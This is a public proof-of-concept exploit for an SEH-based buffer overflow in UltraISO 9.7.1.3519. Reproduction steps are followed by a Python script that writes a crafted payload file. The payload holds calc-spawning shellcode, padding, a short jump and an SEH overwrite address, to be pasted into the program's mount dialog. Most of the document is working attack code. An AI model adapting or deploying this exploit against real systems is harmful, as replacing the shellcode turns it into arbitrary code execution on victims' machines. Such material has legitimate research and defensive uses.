# Exploit Title: UltraISO 9.7.1.3519 - Buffer Overflow (SEH)
# Date: 2018-08-23
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Vendor Homepage: https://www.ultraiso.com
# Software Link Download : https://www.ultraiso.com/download.html
# Tested on: Windows 7 Ultimate - 64-bit
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new
# 2. File with the name "exploit.txt" just copy the text inside "exploit.txt"
# 3. start the UltraISO program.
# 4. In the new window click "Tools" > "Mount To Virtual Drive" .
# 5. Now Paste the content of "exploit.txt" into the field: " Image File ".
# 6. Click "Mount" and you will see a lot of calculators.
# Thanks: corelanc0d3r and PeaceMaker
#!/usr/bin/env python
#Badchars \x00\x0a\x0d
shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
#Exit intermodular call
shellcode += "\xB8\x8A\x70\xA0\xFF\xF7\xD8\x50\xC3"
fill = "\x42" * (126 - len(shellcode))
junk = "A" * (1064 - len(shellcode) - len(fill))
#0x005540e9 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [UltraISO.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v9.7.1.3519 (C:\Program Files (x86)\UltraISO\UltraISO.exe)
sjmp = "\xeb\x80\xCC\xCC"
seh = "\xe9\x40\x55"
spirit = junk + shellcode + fill + sjmp + seh
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(spirit)
f.write(spirit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"